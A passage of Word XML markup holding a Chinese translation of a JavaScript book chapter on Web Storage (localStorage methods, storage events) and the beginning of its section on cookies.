        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.clear();//</w:t>
      </w:r>
      <w:r>
        <w:t>全部删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管通过设置和查询属性能更加方便地存储和获取数据，但是有的时候还是不得不使用上面提到的这些方法的。比方说，其中</w:t>
      </w:r>
      <w:r>
        <w:t>clear()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是唯一能删除存储对象中所有名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的方式。同样的还有，</w:t>
      </w:r>
      <w:r>
        <w:t>removeItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也是唯一通用的删除单个名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的方式，因为</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器提供商完全实现了</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的标准，支持对象和数组类型的数据存储，那么就会又多了一个使用类似于</w:t>
      </w:r>
      <w:r>
        <w:t>setItem()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getItem()</w:t>
      </w:r>
      <w:r>
        <w:t>这类方法的理由。对象和数组类型的值通常是可变的，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>因此存储对象要求存储它们的副本，以确保之后任何对这类对象的改变都不影响到存储的对象。同样的，在获取该对象的时候也要求获取的是该对象的副本，以确保对已获取对象的改动不会影响到存储的对象。而这类操作如果使用基于属性的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>就会令人困惑。考虑下面这段代码（假设浏览器已经支持了结构化数据的存储）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.</w:t>
      </w:r>
      <w:r>
        <w:t>o={x:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>存储一个带有</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.o.x=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>试图去设置该对象的属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:x</w:t>
      </w:r>
      <w:r>
        <w:t>没有变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述第二行代码想要设置存储的对象的属性值，但是事实上，它获取到的只是存储的对象的副本，随后设置了该对象的属性值，然后就将该副本废弃了。真正存储的对象保持不变。像这样的情况，使用</w:t>
      </w:r>
      <w:r>
        <w:t>getItem()</w:t>
      </w:r>
      <w:r>
        <w:t>就不会这么让人困惑了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.getItem("o").x=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>我们并不想存储</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，还有另外一个使用显式的机遇方法的存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的理由就是：在还不支持</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>标准的浏览器中，其他的存储机制的顶层</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>对其也是兼容的。下面这段代码使用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE userData</w:t>
      </w:r>
      <w:r>
        <w:t>来实现存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。如果使用基于方法的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，当</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>可用的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时候就可以使用它编写代码，而当它在其他浏览器上不可用的时候依然可以依赖于其他的存储机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。代码如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>识别出使用的是哪类存储机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var memory=window.localStorage||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(window.UserData</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>new UserDataStorage())||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new cookieStorage();//</w:t>
      </w:r>
      <w:r>
        <w:t>然后在对应的机制中查询数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var username=memory.getItem("username");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="20_1_3_Cun_Chu_Shi_Jian_"/>
      <w:r>
        <w:t>20.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　存储事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>无论什么时候存储在</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的数据发生改变，浏览器都会在其他对该数据可见的窗口对象上触发存储事件（但是，在对数据进行改变的窗口对象上是不会触发的）。如果浏览器有两个标签页都打开了来自同源的页面，其中一个页面在</w:t>
      </w:r>
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>上存储了数据，那么另外一个标签页就会接收到一个存储事件。要记住的是</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域是限制在顶层窗口的，因此对</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的改变只有当有相牵连的窗口的时候才会触发存储事件。还有要注意的是，只有当存储数据真正发生改变的时候才会触发存储事件。像给已经存在的存储项设置一个一模一样的值，抑或是删除一个本来就不存在的存储项都是不会触发存储事件的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为存储事件注册处理程序可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（或者在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>下使用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）。在</w:t>
      </w:r>
      <w:r>
        <w:t>绝大多数浏览器中，还可以使用给</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象设置</w:t>
      </w:r>
      <w:r>
        <w:t>onstorage</w:t>
      </w:r>
      <w:r>
        <w:t>属性的方式，不过</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>不支持该属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与存储事件相关的事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个非常重要的属性（遗憾的是，</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>不支持它们）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>被设置或者移除的项的名字或者键名。如果调用的是</w:t>
      </w:r>
      <w:r>
        <w:t>clear()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，那么该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>newValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>保存该项的新值；或者调用</w:t>
      </w:r>
      <w:r>
        <w:t>removeItem()</w:t>
      </w:r>
      <w:r>
        <w:t>时，该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>oldValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>改变或者删除该项前，保存该项原先的值；当插入一个新项的时候，该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>storageArea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>属性值就好比是目标</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>属性或者是</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>触发该存储变化脚本所在文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后要注意的是：</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和存储事件都是采用广播机制的，浏览器会对目前正在访问同样站点的所有窗口发送消息。举个例子，如果一个用户要求网站停止动画效果，那么站点可能会在</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>中存储该用户的首选项，这样依赖，以后再访问该站点的时候就自动停止动画效果了。因为存储了该首选项，导致了触发一个存储事件让其他展现统一站点的窗口也获得了这样</w:t>
      </w:r>
      <w:r>
        <w:t>的一个用户请求。再比如，一个基于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的图片编辑应用，通常允许在其他的窗口中展示工具条。当用户选择一个工具的时候，应用就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>来存储当前的状态，然后通知其他窗口用户选择了新的工具。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="510" w:name="20_2_cookie"/>
      <w:r>
        <w:t>20.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是指</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器存储的少量数据，同时它是与具体的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面或者站点相关的。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>最早是设计为被服务端所用的，从最底层来看，作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议的一种扩展实现它。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据会自动在</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器之间传输的，因此服务端脚本就可以读、写存储在客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>co</w:t>
      </w:r>
      <w:r>
        <w:t>okie</w:t>
      </w:r>
      <w:r>
        <w:t>的值。本节将介绍客户端的脚本如何通过使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性实现对</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>为什么叫</w:t>
      </w:r>
      <w:r>
        <w:t>"cookie"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"cookie"</w:t>
      </w:r>
      <w:r>
        <w:t>这个名字没有太多的含义，但是在计算机历史上其实很早就用到它了。</w:t>
      </w:r>
      <w:r>
        <w:t>"cookie"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"magic </w:t>
      </w:r>
      <w:r>
        <w:t>cookie"</w:t>
      </w:r>
      <w:r>
        <w:t>用于代表少量数据，特别是指类似密码这种用于识别身份或者许可访问的保密数据。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>用于保存状态以及能够为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器提供一种身份识别机制。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>不会采用任何加密机制，因此它们是不安全的。（但是，通过</w:t>
      </w:r>
      <w:r>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:t>来传输</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据是安全的，不过这和</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>本身无关，而和</w:t>
      </w:r>
      <w:r>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:t>协议相关。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>很早就已经定义和实现了，因此该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的兼容性很好。但是，该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>几乎形同虚设。根本没有提供诸如查询、设置、</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，所有这些操作都要通过以特殊格式的字符串形式读写</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性来完成。每个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期和作用域都可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性来分别指定。这些属性也是通过在同一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性上以特殊格式的字符串来设定的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本节剩余部分会解释如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期和作用域，以及如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来设置和查询</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值。最后，将以一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实现基于</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的存储</w:t>
      </w:r>
      <w:r>
        <w:t>API”</w:t>
      </w:r>
      <w:r>
        <w:t>例子来结束本节的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是否启用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于滥用第三方</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>（如：</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是和网页上的图片相关而非网页本身相关）的缘故，导致</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>在大多数</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>用户心目中都留下了很不好的印象。比如，广告公司可以利用第三方</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>来实现跟踪用户的访问行为和习惯，而用户为了禁止这种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>窥探</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>用户隐私的行为会在它们的浏览器中禁用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。因此，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>前，首先要确保</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是启用的。在绝大多数浏览器中，可以通过检测</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.cookieEnabled</w:t>
      </w:r>
      <w:r>
        <w:t>这个属性实现。若该值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则当前</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是启用</w:t>
      </w:r>
      <w:r>
        <w:t>的；反之则是禁用的（但是，只具备</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前浏览会话生命周期</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的非持久化</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>仍然是启用的）。但是，该属性不是一个标准的属性（不是所有浏览器都支持的）。因此在不支持该属性的浏览器上，必须通过使用下面将要介绍的技术尝试着读、写和删除测试</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据来测试是否支持</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="20_2_1_cookieShu_Xing__You_Xiao_Qi_He_Zu"/>
      <w:r>
        <w:t>20.2.1</w:t>
